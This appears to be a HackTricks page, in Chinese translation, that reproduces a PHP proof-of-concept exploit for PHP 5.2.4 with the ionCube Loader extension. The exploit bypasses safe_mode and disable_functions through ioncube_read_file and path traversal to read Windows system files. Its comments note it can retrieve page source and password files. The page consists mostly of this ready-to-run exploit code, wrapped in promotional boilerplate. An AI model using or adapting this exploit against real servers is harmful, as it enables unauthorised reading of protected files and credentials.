disable_functions - PHP 5.2.4 ionCube extension Exploit
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)!
其他支持HackTricks的方式:
如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
PHP 5.2.4 ionCube扩展漏洞利用
<?php
//PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass
//author: shinnai
//mail: shinnai[at]autistici[dot]org
//site: http://shinnai.altervista.org
//Tested on xp Pro sp2 full patched, worked both from the cli and on apache
//Technical details:
//ionCube version: 6.5
//extension: ioncube_loader_win_5.2.dll (other may also be vulnerable)
//url: www.ioncube.com
//php.ini settings:
//safe_mode = On
//disable_functions = ioncube_read_file, readfile
//Description:
//This is useful to obtain juicy informations but also to retrieve source
//code of php pages, password files, etc... you just need to change file path.
//Anyway, don't worry, nobody will read your obfuscated code :)
//greetz to: BlackLight for help me to understand better PHP
//P.S.
//This extension contains even an interesting ioncube_write_file function...
if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
$path = str_repeat("..\\", 20);
$MyBoot_readfile = readfile($path."windows\\system.ini"); #just to be sure that I set correctely disable_function :)
$MyBoot_ioncube = ioncube_read_file($path."boot.ini");
echo $MyBoot_readfile;
echo "<br><br>ionCube output:<br><br>";
echo $MyBoot_ioncube;
?>从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)!
其他支持HackTricks的方式:
如果您想看到您的公司在HackTricks中做广告或下载PDF格式的HackTricks,请查看订阅计划!
加入 💬 Discord群 或 电报群 或 关注我们的Twitter 🐦 @carlospolopm。
通过向HackTricks和HackTricks Cloud github仓库提交PR来分享您的黑客技巧。
上一页disable_functions - PHP 5.x Shellshock Exploit下一页disable_functions bypass - PHP <= 5.2.9 on windows
最后更新于